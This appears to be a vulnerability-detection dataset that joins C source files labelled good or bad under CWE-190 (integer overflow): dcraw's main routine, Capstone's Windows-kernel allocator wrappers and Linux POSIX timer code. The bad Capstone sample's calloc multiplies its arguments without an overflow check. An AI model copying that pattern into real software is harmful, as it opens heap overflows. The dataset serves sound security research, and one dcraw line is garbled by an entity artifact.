t->tm_year+1900,t->tm_mon+1,t->tm_mday,t->tm_hour,t->tm_min,t->tm_sec);
strncpy (th->t_artist, artist, 64);
if (full) {
tiff_set (th, &th->ntag, 254, 4, 1, 0);
tiff_set (th, &th->ntag, 256, 4, 1, width);
tiff_set (th, &th->ntag, 257, 4, 1, height);
tiff_set (th, &th->ntag, 258, 3, colors, output_bps);
if (colors > 2)
th->tag[th->ntag-1].val.i = TOFF(th->bps);
FORC4 th->bps[c] = output_bps;
tiff_set (th, &th->ntag, 259, 3, 1, 1);
tiff_set (th, &th->ntag, 262, 3, 1, 1 + (colors > 1));
}
tiff_set (th, &th->ntag, 270, 2, 512, TOFF(th->t_desc));
tiff_set (th, &th->ntag, 271, 2, 64, TOFF(th->t_make));
tiff_set (th, &th->ntag, 272, 2, 64, TOFF(th->t_model));
if (full) {
if (oprof) psize = ntohl(oprof[0]);
tiff_set (th, &th->ntag, 273, 4, 1, sizeof *th + psize);
tiff_set (th, &th->ntag, 277, 3, 1, colors);
tiff_set (th, &th->ntag, 278, 4, 1, height);
tiff_set (th, &th->ntag, 279, 4, 1, height*width*colors*output_bps/8);
} else
tiff_set (th, &th->ntag, 274, 3, 1, "12435867"[flip]-'0');
tiff_set (th, &th->ntag, 282, 5, 1, TOFF(th->rat[0]));
tiff_set (th, &th->ntag, 283, 5, 1, TOFF(th->rat[2]));
tiff_set (th, &th->ntag, 284, 3, 1, 1);
tiff_set (th, &th->ntag, 296, 3, 1, 2);
tiff_set (th, &th->ntag, 305, 2, 32, TOFF(th->soft));
tiff_set (th, &th->ntag, 306, 2, 20, TOFF(th->date));
tiff_set (th, &th->ntag, 315, 2, 64, TOFF(th->t_artist));
tiff_set (th, &th->ntag, 34665, 4, 1, TOFF(th->nexif));
if (psize) tiff_set (th, &th->ntag, 34675, 7, psize, sizeof *th);
tiff_set (th, &th->nexif, 33434, 5, 1, TOFF(th->rat[4]));
tiff_set (th, &th->nexif, 33437, 5, 1, TOFF(th->rat[6]));
tiff_set (th, &th->nexif, 34855, 3, 1, iso_speed);
tiff_set (th, &th->nexif, 37386, 5, 1, TOFF(th->rat[8]));
if (gpsdata[1]) {
tiff_set (th, &th->ntag, 34853, 4, 1, TOFF(th->ngps));
tiff_set (th, &th->ngps, 0, 1, 4, 0x202);
tiff_set (th, &th->ngps, 1, 2, 2, gpsdata[29]);
tiff_set (th, &th->ngps, 2, 5, 3, TOFF(th->gps[0]));
tiff_set (th, &th->ngps, 3, 2, 2, gpsdata[30]);
tiff_set (th, &th->ngps, 4, 5, 3, TOFF(th->gps[6]));
tiff_set (th, &th->ngps, 5, 1, 1, gpsdata[31]);
tiff_set (th, &th->ngps, 6, 5, 1, TOFF(th->gps[18]));
tiff_set (th, &th->ngps, 7, 5, 3, TOFF(th->gps[12]));
tiff_set (th, &th->ngps, 18, 2, 12, TOFF(th->gps[20]));
tiff_set (th, &th->ngps, 29, 2, 12, TOFF(th->gps[23]));
memcpy (th->gps, gpsdata, sizeof th->gps);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS jpeg_thumb_writer (FILE *tfp,char *t_humb,int t_humb_length)
{
ushort exif[5];
struct tiff_hdr th;
fputc (0xff, tfp);
fputc (0xd8, tfp);
if (strcmp (t_humb+6, "Exif")) {
memcpy (exif, "\xff\xe1 Exif\0\0", 10);
exif[1] = htons (8 + sizeof th);
fwrite (exif, 1, sizeof exif, tfp);
tiff_head (&th, 0);
fwrite (&th, 1, sizeof th, tfp);
}
fwrite (t_humb+2, 1, t_humb_length-2, tfp);
}
void CLASS jpeg_thumb()
{
char *thumb;
thumb = (char *) malloc (thumb_length);
merror (thumb, "jpeg_thumb()");
fread (thumb, 1, thumb_length, ifp);
jpeg_thumb_writer(ofp,thumb,thumb_length);
free (thumb);
}
#else
void CLASS jpeg_thumb()
{
char *thumb;
ushort exif[5];
struct tiff_hdr th;
thumb = (char *) malloc (thumb_length);
merror (thumb, "jpeg_thumb()");
fread (thumb, 1, thumb_length, ifp);
fputc (0xff, ofp);
fputc (0xd8, ofp);
if (strcmp (thumb+6, "Exif")) {
memcpy (exif, "\xff\xe1 Exif\0\0", 10);
exif[1] = htons (8 + sizeof th);
fwrite (exif, 1, sizeof exif, ofp);
tiff_head (&th, 0);
fwrite (&th, 1, sizeof th, ofp);
}
fwrite (thumb+2, 1, thumb_length-2, ofp);
free (thumb);
}
#endif
void CLASS write_ppm_tiff()
{
struct tiff_hdr th;
uchar *ppm;
ushort *ppm2;
int c, row, col, soff, rstep, cstep;
int perc, val, total, t_white=0x2000;
#ifdef LIBRAW_LIBRARY_BUILD
perc = width * height * auto_bright_thr;
#else
perc = width * height * 0.01; /* 99th percentile white level */
#endif
if (fuji_width) perc /= 2;
if (!((highlight & ~2) || no_auto_bright))
for (t_white=c=0; c < colors; c++) {
for (val=0x2000, total=0; --val > 32; )
if ((total += histogram[c][val]) > perc) break;
if (t_white < val) t_white = val;
}
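  /* t_white now holds the largest per-channel level below which roughly
     99% of the pixels fall (or the auto_bright_thr quantile in the
     library build); it becomes the white point handed to gamma_curve(). */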
gamma_curve (gamm[0], gamm[1], 2, (t_white << 3)/bright);
iheight = height;
iwidth = width;
if (flip & 4) SWAP(height,width);
ppm = (uchar *) calloc (width, colors*output_bps/8);
ppm2 = (ushort *) ppm;
merror (ppm, "write_ppm_tiff()");
if (output_tiff) {
tiff_head (&th, 1);
fwrite (&th, sizeof th, 1, ofp);
if (oprof)
fwrite (oprof, ntohl(oprof[0]), 1, ofp);
} else if (colors > 3)
fprintf (ofp,
"P7\nWIDTH %d\nHEIGHT %d\nDEPTH %d\nMAXVAL %d\nTUPLTYPE %s\nENDHDR\n",
width, height, colors, (1 << output_bps)-1, cdesc);
else
fprintf (ofp, "P%d\n%d %d\n%d\n",
colors/2+5, width, height, (1 << output_bps)-1);
soff = flip_index (0, 0);
cstep = flip_index (0, 1) - soff;
rstep = flip_index (1, 0) - flip_index (0, width);
for (row=0; row < height; row++, soff += rstep) {
for (col=0; col < width; col++, soff += cstep)
if (output_bps == 8)
FORCC ppm [col*colors+c] = curve[image[soff][c]] >> 8;
else FORCC ppm2[col*colors+c] = curve[image[soff][c]];
if (output_bps == 16 && !output_tiff && htons(0x55aa) != 0x55aa)
swab ((char*)ppm2, (char*)ppm2, width*colors*2);
fwrite (ppm, colors*output_bps/8, width, ofp);
}
free (ppm);
}
//@end COMMON
int CLASS main (int argc, const char **argv)
{
int arg, status=0, quality, i, c;
int timestamp_only=0, thumbnail_only=0, identify_only=0;
int user_qual=-1, user_black=-1, user_sat=-1, user_flip=-1;
int use_fuji_rotate=1, write_to_stdout=0, read_from_stdin=0;
const char *sp, *bpfile=0, *dark_frame=0, *write_ext;
char opm, opt, *ofname, *cp;
struct utimbuf ut;
#ifndef NO_LCMS
const char *cam_profile=0, *out_profile=0;
#endif
#ifndef LOCALTIME
putenv ((char *) "TZ=UTC");
#endif
#ifdef LOCALEDIR
setlocale (LC_CTYPE, "");
setlocale (LC_MESSAGES, "");
bindtextdomain ("dcraw", LOCALEDIR);
textdomain ("dcraw");
#endif
if (argc == 1) {
printf(_("\nRaw photo decoder \"dcraw\" v%s"), DCRAW_VERSION);
printf(_("\nby Dave Coffin, dcoffin a cybercom o net\n"));
printf(_("\nUsage: %s [OPTION]... [FILE]...\n\n"), argv[0]);
puts(_("-v Print verbose messages"));
puts(_("-c Write image data to standard output"));
puts(_("-e Extract embedded thumbnail image"));
puts(_("-i Identify files without decoding them"));
puts(_("-i -v Identify files and show metadata"));
puts(_("-z Change file dates to camera timestamp"));
puts(_("-w Use camera white balance, if possible"));
puts(_("-a Average the whole image for white balance"));
puts(_("-A <x y w h> Average a grey box for white balance"));
puts(_("-r <r g b g> Set custom white balance"));
puts(_("+M/-M Use/don't use an embedded color matrix"));
puts(_("-C <r b> Correct chromatic aberration"));
puts(_("-P <file> Fix the dead pixels listed in this file"));
puts(_("-K <file> Subtract dark frame (16-bit raw PGM)"));
puts(_("-k <num> Set the darkness level"));
puts(_("-S <num> Set the saturation level"));
puts(_("-n <num> Set threshold for wavelet denoising"));
puts(_("-H [0-9] Highlight mode (0=clip, 1=unclip, 2=blend, 3+=rebuild)"));
puts(_("-t [0-7] Flip image (0=none, 3=180, 5=90CCW, 6=90CW)"));
puts(_("-o [0-5] Output colorspace (raw,sRGB,Adobe,Wide,ProPhoto,XYZ)"));
#ifndef NO_LCMS
puts(_("-o <file> Apply output ICC profile from file"));
puts(_("-p <file> Apply camera ICC profile from file or \"embed\""));
#endif
puts(_("-d Document mode (no color, no interpolation)"));
puts(_("-D Document mode without scaling (totally raw)"));
puts(_("-j Don't stretch or rotate raw pixels"));
puts(_("-W Don't automatically brighten the image"));
puts(_("-b <num> Adjust brightness (default = 1.0)"));
puts(_("-g <p ts> Set custom gamma curve (default = 2.222 4.5)"));
puts(_("-q [0-3] Set the interpolation quality"));
puts(_("-h Half-size color image (twice as fast as \"-q 0\")"));
puts(_("-f Interpolate RGGB as four colors"));
puts(_("-m <num> Apply a 3x3 median filter to R-G and B-G"));
puts(_("-s [0..N-1] Select one raw image or \"all\" from each file"));
puts(_("-6 Write 16-bit instead of 8-bit"));
puts(_("-4 Linear 16-bit, same as \"-6 -W -g 1 1\""));
puts(_("-T Write TIFF instead of PPM"));
puts("");
return 1;
}
argv[argc] = "";
for (arg=1; (((opm = argv[arg][0]) - 2) | 2) == '+'; ) {
opt = argv[arg++][1];
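    /* Each letter in "nbrkStqmHACg" is paired with the digit at the same
       index in "114111111422": the number of numeric arguments that
       option must be followed by (-r and -A take four, -C and -g two). */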
if ((cp = (char *) strchr (sp="nbrkStqmHACg", opt)))
for (i=0; i < "114111111422"[cp-sp]-'0'; i++)
if (!isdigit(argv[arg+i][0])) {
fprintf (stderr,_("Non-numeric argument to \"-%c\"\n"), opt);
return 1;
}
switch (opt) {
case 'n': threshold = atof(argv[arg++]); break;
case 'b': bright = atof(argv[arg++]); break;
case 'r':
FORC4 user_mul[c] = atof(argv[arg++]); break;
case 'C': aber[0] = 1 / atof(argv[arg++]);
aber[2] = 1 / atof(argv[arg++]); break;
case 'g': gamm[0] = atof(argv[arg++]);
gamm[1] = atof(argv[arg++]);
if (gamm[0]) gamm[0] = 1/gamm[0]; break;
case 'k': user_black = atoi(argv[arg++]); break;
case 'S': user_sat = atoi(argv[arg++]); break;
case 't': user_flip = atoi(argv[arg++]); break;
case 'q': user_qual = atoi(argv[arg++]); break;
case 'm': med_passes = atoi(argv[arg++]); break;
case 'H': highlight = atoi(argv[arg++]); break;
case 's':
shot_select = abs(atoi(argv[arg]));
multi_out = !strcmp(argv[arg++],"all");
break;
case 'o':
if (isdigit(argv[arg][0]) && !argv[arg][1])
output_color = atoi(argv[arg++]);
#ifndef NO_LCMS
else out_profile = argv[arg++];
break;
case 'p': cam_profile = argv[arg++];
#endif
break;
case 'P': bpfile = argv[arg++]; break;
case 'K': dark_frame = argv[arg++]; break;
case 'z': timestamp_only = 1; break;
case 'e': thumbnail_only = 1; break;
case 'i': identify_only = 1; break;
case 'c': write_to_stdout = 1; break;
case 'v': verbose = 1; break;
case 'h': half_size = 1; break;
case 'f': four_color_rgb = 1; break;
case 'A': FORC4 greybox[c] = atoi(argv[arg++]);
case 'a': use_auto_wb = 1; break;
case 'w': use_camera_wb = 1; break;
case 'M': use_camera_matrix = 3 * (opm == '+'); break;
case 'I': read_from_stdin = 1; break;
case 'E': document_mode++;
case 'D': document_mode++;
case 'd': document_mode++;
case 'j': use_fuji_rotate = 0; break;
case 'W': no_auto_bright = 1; break;
case 'T': output_tiff = 1; break;
case '4': gamm[0] = gamm[1] =
no_auto_bright = 1;
case '6': output_bps = 16; break;
default:
fprintf (stderr,_("Unknown option \"-%c\".\n"), opt);
return 1;
}
}
if (arg == argc) {
fprintf (stderr,_("No files to process.\n"));
return 1;
}
if (write_to_stdout) {
if (isatty(1)) {
fprintf (stderr,_("Will not write an image to the terminal!\n"));
return 1;
}
#if defined(WIN32) || defined(DJGPP) || defined(__CYGWIN__)
if (setmode(1,O_BINARY) < 0) {
perror ("setmode()");
return 1;
}
#endif
}
for ( ; arg < argc; arg++) {
status = 1;
raw_image = 0;
image = 0;
oprof = 0;
meta_data = ofname = 0;
ofp = stdout;
if (setjmp (failure)) {
if (fileno(ifp) > 2) fclose(ifp);
if (fileno(ofp) > 2) fclose(ofp);
status = 1;
goto cleanup;
}
ifname = argv[arg];
if (!(ifp = fopen (ifname, "rb"))) {
perror (ifname);
continue;
}
status = (identify(),!is_raw);
if (user_flip >= 0)
flip = user_flip;
switch ((flip+3600) % 360) {
case 270: flip = 5; break;
case 180: flip = 3; break;
case 90: flip = 6;
}
if (timestamp_only) {
if ((status = !timestamp))
fprintf (stderr,_("%s has no timestamp.\n"), ifname);
else if (identify_only)
printf ("%10ld%10d %s\n", (long) timestamp, shot_order, ifname);
else {
if (verbose)
fprintf (stderr,_("%s time set to %d.\n"), ifname, (int) timestamp);
ut.actime = ut.modtime = timestamp;
utime (ifname, &ut);
}
goto next;
}
write_fun = &CLASS write_ppm_tiff;
if (thumbnail_only) {
if ((status = !thumb_offset)) {
fprintf (stderr,_("%s has no thumbnail.\n"), ifname);
goto next;
} else if (thumb_load_raw) {
load_raw = thumb_load_raw;
data_offset = thumb_offset;
height = thumb_height;
width = thumb_width;
filters = 0;
colors = 3;
} else {
fseek (ifp, thumb_offset, SEEK_SET);
write_fun = write_thumb;
goto thumbnail;
}
}
if (load_raw == &CLASS kodak_ycbcr_load_raw) {
height += height & 1;
width += width & 1;
}
if (identify_only && verbose && make[0]) {
printf (_("\nFilename: %s\n"), ifname);
printf (_("Timestamp: %s"), ctime(×tamp));
printf (_("Camera: %s %s\n"), make, model);
if (artist[0])
printf (_("Owner: %s\n"), artist);
if (dng_version) {
printf (_("DNG Version: "));
for (i=24; i >= 0; i -= 8)
printf ("%d%c", dng_version >> i & 255, i ? '.':'\n');
}
printf (_("ISO speed: %d\n"), (int) iso_speed);
printf (_("Shutter: "));
if (shutter > 0 && shutter < 1)
shutter = (printf ("1/"), 1 / shutter);
printf (_("%0.1f sec\n"), shutter);
printf (_("Aperture: f/%0.1f\n"), aperture);
printf (_("Focal length: %0.1f mm\n"), focal_len);
printf (_("Embedded ICC profile: %s\n"), profile_length ? _("yes"):_("no"));
printf (_("Number of raw images: %d\n"), is_raw);
if (pixel_aspect != 1)
printf (_("Pixel Aspect Ratio: %0.6f\n"), pixel_aspect);
if (thumb_offset)
printf (_("Thumb size: %4d x %d\n"), thumb_width, thumb_height);
printf (_("Full size: %4d x %d\n"), raw_width, raw_height);
} else if (!is_raw)
fprintf (stderr,_("Cannot decode file %s\n"), ifname);
if (!is_raw) goto next;
shrink = filters && (half_size || (!identify_only &&
(threshold || aber[0] != 1 || aber[2] != 1)));
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (identify_only) {
if (verbose) {
if (document_mode == 3) {
top_margin = left_margin = fuji_width = 0;
height = raw_height;
width = raw_width;
}
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (use_fuji_rotate) {
if (fuji_width) {
fuji_width = (fuji_width - 1 + shrink) >> shrink;
iwidth = fuji_width / sqrt(0.5);
iheight = (iheight - fuji_width) / sqrt(0.5);
} else {
if (pixel_aspect < 1) iheight = iheight / pixel_aspect + 0.5;
if (pixel_aspect > 1) iwidth = iwidth * pixel_aspect + 0.5;
}
}
if (flip & 4)
SWAP(iheight,iwidth);
printf (_("Image size: %4d x %d\n"), width, height);
printf (_("Output size: %4d x %d\n"), iwidth, iheight);
printf (_("Raw colors: %d"), colors);
if (filters) {
int fhigh = 2, fwide = 2;
if ((filters ^ (filters >> 8)) & 0xff) fhigh = 4;
if ((filters ^ (filters >> 16)) & 0xffff) fhigh = 8;
if (filters == 1) fhigh = fwide = 16;
if (filters == 9) fhigh = fwide = 6;
printf (_("\nFilter pattern: "));
for (i=0; i < fhigh; i++)
for (c = i && putchar('/') && 0; c < fwide; c++)
putchar (cdesc[fcol(i,c)]);
}
printf (_("\nDaylight multipliers:"));
FORCC printf (" %f", pre_mul[c]);
if (cam_mul[0] > 0) {
printf (_("\nCamera multipliers:"));
FORC4 printf (" %f", cam_mul[c]);
}
putchar ('\n');
} else
printf (_("%s is a %s %s image.\n"), ifname, make, model);
next:
fclose(ifp);
continue;
}
if (meta_length) {
meta_data = (char *) malloc (meta_length);
merror (meta_data, "main()");
}
if (filters || colors == 1) {
raw_image = (ushort *) calloc ((raw_height+7), raw_width*2);
merror (raw_image, "main()");
} else {
image = (ushort (*)[4]) calloc (iheight, iwidth*sizeof *image);
merror (image, "main()");
}
if (verbose)
fprintf (stderr,_("Loading %s %s image from %s ...\n"),
make, model, ifname);
if (shot_select >= is_raw)
fprintf (stderr,_("%s: \"-s %d\" requests a nonexistent image!\n"),
ifname, shot_select);
fseeko (ifp, data_offset, SEEK_SET);
if (raw_image && read_from_stdin)
fread (raw_image, 2, raw_height*raw_width, stdin);
else (*load_raw)();
if (document_mode == 3) {
top_margin = left_margin = fuji_width = 0;
height = raw_height;
width = raw_width;
}
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (raw_image) {
image = (ushort (*)[4]) calloc (iheight, iwidth*sizeof *image);
merror (image, "main()");
crop_masked_pixels();
free (raw_image);
}
if (zero_is_bad) remove_zeroes();
bad_pixels (bpfile);
if (dark_frame) subtract (dark_frame);
quality = 2 + !fuji_width;
if (user_qual >= 0) quality = user_qual;
i = cblack[3];
FORC3 if (i > cblack[c]) i = cblack[c];
FORC4 cblack[c] -= i;
black += i;
i = cblack[6];
FORC (cblack[4] * cblack[5])
if (i > cblack[6+c]) i = cblack[6+c];
FORC (cblack[4] * cblack[5])
cblack[6+c] -= i;
black += i;
if (user_black >= 0) black = user_black;
FORC4 cblack[c] += black;
if (user_sat > 0) maximum = user_sat;
#ifdef COLORCHECK
colorcheck();
#endif
if (is_foveon) {
if (document_mode || load_raw == &CLASS foveon_dp_load_raw) {
for (i=0; i < height*width*4; i++)
if ((short) image[0][i] < 0) image[0][i] = 0;
} else foveon_interpolate();
} else if (document_mode < 2)
scale_colors();
pre_interpolate();
if (filters && !document_mode) {
if (quality == 0)
lin_interpolate();
else if (quality == 1 || colors > 3)
vng_interpolate();
else if (quality == 2 && filters > 1000)
ppg_interpolate();
else if (filters == 9)
xtrans_interpolate (quality*2-3);
else
ahd_interpolate();
}
if (mix_green)
for (colors=3, i=0; i < height*width; i++)
image[i][1] = (image[i][1] + image[i][3]) >> 1;
if (!is_foveon && colors == 3) median_filter();
if (!is_foveon && highlight == 2) blend_highlights();
if (!is_foveon && highlight > 2) recover_highlights();
if (use_fuji_rotate) fuji_rotate();
#ifndef NO_LCMS
if (cam_profile) apply_profile (cam_profile, out_profile);
#endif
convert_to_rgb();
if (use_fuji_rotate) stretch();
thumbnail:
if (write_fun == &CLASS jpeg_thumb)
write_ext = ".jpg";
else if (output_tiff && write_fun == &CLASS write_ppm_tiff)
write_ext = ".tiff";
else
write_ext = ".pgm\0.ppm\0.ppm\0.pam" + colors*5-5;
ofname = (char *) malloc (strlen(ifname) + 64);
merror (ofname, "main()");
if (write_to_stdout)
strcpy (ofname,_("standard output"));
else {
strcpy (ofname, ifname);
if ((cp = strrchr (ofname, '.'))) *cp = 0;
if (multi_out)
sprintf (ofname+strlen(ofname), "_%0*d",
snprintf(0,0,"%d",is_raw-1), shot_select);
if (thumbnail_only)
strcat (ofname, ".thumb");
strcat (ofname, write_ext);
ofp = fopen (ofname, "wb");
if (!ofp) {
status = 1;
perror (ofname);
goto cleanup;
}
}
if (verbose)
fprintf (stderr,_("Writing data to %s ...\n"), ofname);
(*write_fun)();
fclose(ifp);
if (ofp != stdout) fclose(ofp);
cleanup:
if (meta_data) free (meta_data);
if (ofname) free (ofname);
if (oprof) free (oprof);
if (image) free (image);
if (multi_out) {
if (++shot_select < is_raw) arg--;
else shot_select = 0;
}
}
return status;
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_582_0 |
crossvul-cpp_data_bad_3237_0 | /* Capstone Disassembly Engine */
/* By Satoshi Tanda <tanda.sat@gmail.com>, 2016 */
#include "winkernel_mm.h"
#include <ntddk.h>
// A pool tag for memory allocation
static const ULONG CS_WINKERNEL_POOL_TAG = 'kwsC';
// A structure to implement realloc()
typedef struct _CS_WINKERNEL_MEMBLOCK {
size_t size; // A number of bytes allocated
char data[1]; // An address returned to a caller
} CS_WINKERNEL_MEMBLOCK;
C_ASSERT(sizeof(CS_WINKERNEL_MEMBLOCK) == sizeof(void *) * 2);
// free()
void CAPSTONE_API cs_winkernel_free(void *ptr)
{
if (ptr) {
ExFreePoolWithTag(CONTAINING_RECORD(ptr, CS_WINKERNEL_MEMBLOCK, data), CS_WINKERNEL_POOL_TAG);
}
}
// malloc()
void * CAPSTONE_API cs_winkernel_malloc(size_t size)
{
	// Disallow zero length allocations because they waste pool header space
	// and, in many cases, indicate a potential validation issue in the
	// calling code.
NT_ASSERT(size);
// FP; a use of NonPagedPool is required for Windows 7 support
#pragma prefast(suppress : 30030) // Allocating executable POOL_TYPE memory
CS_WINKERNEL_MEMBLOCK *block = (CS_WINKERNEL_MEMBLOCK *)ExAllocatePoolWithTag(
NonPagedPool, size + sizeof(CS_WINKERNEL_MEMBLOCK), CS_WINKERNEL_POOL_TAG);
if (!block) {
return NULL;
}
block->size = size;
return block->data;
}
// calloc()
void * CAPSTONE_API cs_winkernel_calloc(size_t n, size_t size)
{
size_t total = n * size;
void *new_ptr = cs_winkernel_malloc(total);
if (!new_ptr) {
return NULL;
}
return RtlFillMemory(new_ptr, total, 0);
}
// realloc()
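// The CS_WINKERNEL_MEMBLOCK header stored in front of every allocation is
// what makes realloc() possible here: CONTAINING_RECORD() walks back from
// the data pointer to the header to recover the old size, so only the
// smaller of the old and new sizes is copied before the old block is freed.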
void * CAPSTONE_API cs_winkernel_realloc(void *ptr, size_t size)
{
void *new_ptr = NULL;
size_t current_size = 0;
size_t smaller_size = 0;
if (!ptr) {
return cs_winkernel_malloc(size);
}
new_ptr = cs_winkernel_malloc(size);
if (!new_ptr) {
return NULL;
}
current_size = CONTAINING_RECORD(ptr, CS_WINKERNEL_MEMBLOCK, data)->size;
smaller_size = (current_size < size) ? current_size : size;
RtlCopyMemory(new_ptr, ptr, smaller_size);
cs_winkernel_free(ptr);
return new_ptr;
}
// vsnprintf(). _vsnprintf() is available for drivers, but it differs from
// vsnprintf() in a return value and when a null-terminator is set.
// cs_winkernel_vsnprintf() takes care of those differences.
#pragma warning(push)
// Banned API Usage : _vsnprintf is a Banned API as listed in dontuse.h for
// security purposes.
#pragma warning(disable : 28719)
int CAPSTONE_API cs_winkernel_vsnprintf(char *buffer, size_t count, const char *format, va_list argptr)
{
int result = _vsnprintf(buffer, count, format, argptr);
// _vsnprintf() returns -1 when a string is truncated, and returns "count"
// when an entire string is stored but without '\0' at the end of "buffer".
// In both cases, null-terminator needs to be added manually.
if (result == -1 || (size_t)result == count) {
buffer[count - 1] = '\0';
}
if (result == -1) {
// In case when -1 is returned, the function has to get and return a number
// of characters that would have been written. This attempts so by retrying
// the same conversion with temp buffer that is most likely big enough to
// complete formatting and get a number of characters that would have been
// written.
char* tmp = cs_winkernel_malloc(0x1000);
if (!tmp) {
return result;
}
result = _vsnprintf(tmp, 0x1000, format, argptr);
NT_ASSERT(result != -1);
cs_winkernel_free(tmp);
}
return result;
}
#pragma warning(pop)
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3237_0 |
crossvul-cpp_data_good_207_2 | /*
* linux/kernel/posix-timers.c
*
*
* 2002-10-15 Posix Clocks & timers
* by George Anzinger george@mvista.com
*
* Copyright (C) 2002 2003 by MontaVista Software.
*
* 2004-06-01 Fix CLOCK_REALTIME clock/timer TIMER_ABSTIME bug.
* Copyright (C) 2004 Boris Hu
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or (at
* your option) any later version.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
* MontaVista Software | 1237 East Arques Avenue | Sunnyvale | CA 94085 | USA
*/
/* These are all the functions necessary to implement
* POSIX clocks & timers
*/
#include <linux/mm.h>
#include <linux/interrupt.h>
#include <linux/slab.h>
#include <linux/time.h>
#include <linux/mutex.h>
#include <linux/sched/task.h>
#include <linux/uaccess.h>
#include <linux/list.h>
#include <linux/init.h>
#include <linux/compiler.h>
#include <linux/hash.h>
#include <linux/posix-clock.h>
#include <linux/posix-timers.h>
#include <linux/syscalls.h>
#include <linux/wait.h>
#include <linux/workqueue.h>
#include <linux/export.h>
#include <linux/hashtable.h>
#include <linux/compat.h>
#include <linux/nospec.h>
#include "timekeeping.h"
#include "posix-timers.h"
/*
* Management arrays for POSIX timers. Timers are now kept in static hash table
* with 512 entries.
* Timer ids are allocated by local routine, which selects proper hash head by
* key, constructed from current->signal address and per signal struct counter.
* This keeps timer ids unique per process, but now they can intersect between
* processes.
*/
/*
* Lets keep our timers in a slab cache :-)
*/
static struct kmem_cache *posix_timers_cache;
static DEFINE_HASHTABLE(posix_timers_hashtable, 9);
static DEFINE_SPINLOCK(hash_lock);
static const struct k_clock * const posix_clocks[];
static const struct k_clock *clockid_to_kclock(const clockid_t id);
static const struct k_clock clock_realtime, clock_monotonic;
/*
* we assume that the new SIGEV_THREAD_ID shares no bits with the other
* SIGEV values. Here we put out an error if this assumption fails.
*/
#if SIGEV_THREAD_ID != (SIGEV_THREAD_ID & \
~(SIGEV_SIGNAL | SIGEV_NONE | SIGEV_THREAD))
#error "SIGEV_THREAD_ID must not share bit with other SIGEV values!"
#endif
/*
* parisc wants ENOTSUP instead of EOPNOTSUPP
*/
#ifndef ENOTSUP
# define ENANOSLEEP_NOTSUP EOPNOTSUPP
#else
# define ENANOSLEEP_NOTSUP ENOTSUP
#endif
/*
* The timer ID is turned into a timer address by idr_find().
* Verifying a valid ID consists of:
*
* a) checking that idr_find() returns other than -1.
* b) checking that the timer id matches the one in the timer itself.
* c) that the timer owner is in the callers thread group.
*/
/*
* CLOCKs: The POSIX standard calls for a couple of clocks and allows us
* to implement others. This structure defines the various
* clocks.
*
* RESOLUTION: Clock resolution is used to round up timer and interval
* times, NOT to report clock times, which are reported with as
* much resolution as the system can muster. In some cases this
* resolution may depend on the underlying clock hardware and
* may not be quantifiable until run time, and only then is the
* necessary code is written. The standard says we should say
* something about this issue in the documentation...
*
* FUNCTIONS: The CLOCKs structure defines possible functions to
* handle various clock functions.
*
* The standard POSIX timer management code assumes the
* following: 1.) The k_itimer struct (sched.h) is used for
* the timer. 2.) The list, it_lock, it_clock, it_id and
* it_pid fields are not modified by timer code.
*
* Permissions: It is assumed that the clock_settime() function defined
* for each clock will take care of permission checks. Some
* clocks may be set able by any user (i.e. local process
* clocks) others not. Currently the only set able clock we
* have is CLOCK_REALTIME and its high res counter part, both of
* which we beg off on and pass to do_sys_settimeofday().
*/
static struct k_itimer *__lock_timer(timer_t timer_id, unsigned long *flags);
#define lock_timer(tid, flags) \
({ struct k_itimer *__timr; \
__cond_lock(&__timr->it_lock, __timr = __lock_timer(tid, flags)); \
__timr; \
})
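/*
 * Mix the owning signal_struct pointer with the per-process timer id and
 * reduce the result to 9 bits, selecting one of the 512 buckets declared
 * by DEFINE_HASHTABLE(posix_timers_hashtable, 9) above.
 */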
static int hash(struct signal_struct *sig, unsigned int nr)
{
return hash_32(hash32_ptr(sig) ^ nr, HASH_BITS(posix_timers_hashtable));
}
static struct k_itimer *__posix_timers_find(struct hlist_head *head,
struct signal_struct *sig,
timer_t id)
{
struct k_itimer *timer;
hlist_for_each_entry_rcu(timer, head, t_hash) {
if ((timer->it_signal == sig) && (timer->it_id == id))
return timer;
}
return NULL;
}
static struct k_itimer *posix_timer_by_id(timer_t id)
{
struct signal_struct *sig = current->signal;
struct hlist_head *head = &posix_timers_hashtable[hash(sig, id)];
return __posix_timers_find(head, sig, id);
}
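/*
 * Allocate an id for a new timer of the current process.  Starting from
 * the cached sig->posix_timer_id, successive ids are probed until one
 * hashes to a bucket holding no timer with that id for this signal
 * struct; wrapping back to the starting id without success yields -EAGAIN.
 */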
static int posix_timer_add(struct k_itimer *timer)
{
struct signal_struct *sig = current->signal;
int first_free_id = sig->posix_timer_id;
struct hlist_head *head;
int ret = -ENOENT;
do {
spin_lock(&hash_lock);
head = &posix_timers_hashtable[hash(sig, sig->posix_timer_id)];
if (!__posix_timers_find(head, sig, sig->posix_timer_id)) {
hlist_add_head_rcu(&timer->t_hash, head);
ret = sig->posix_timer_id;
}
if (++sig->posix_timer_id < 0)
sig->posix_timer_id = 0;
if ((sig->posix_timer_id == first_free_id) && (ret == -ENOENT))
/* Loop over all possible ids completed */
ret = -EAGAIN;
spin_unlock(&hash_lock);
} while (ret == -ENOENT);
return ret;
}
static inline void unlock_timer(struct k_itimer *timr, unsigned long flags)
{
spin_unlock_irqrestore(&timr->it_lock, flags);
}
/* Get clock_realtime */
static int posix_clock_realtime_get(clockid_t which_clock, struct timespec64 *tp)
{
ktime_get_real_ts64(tp);
return 0;
}
/* Set clock_realtime */
static int posix_clock_realtime_set(const clockid_t which_clock,
const struct timespec64 *tp)
{
return do_sys_settimeofday64(tp, NULL);
}
static int posix_clock_realtime_adj(const clockid_t which_clock,
struct timex *t)
{
return do_adjtimex(t);
}
/*
* Get monotonic time for posix timers
*/
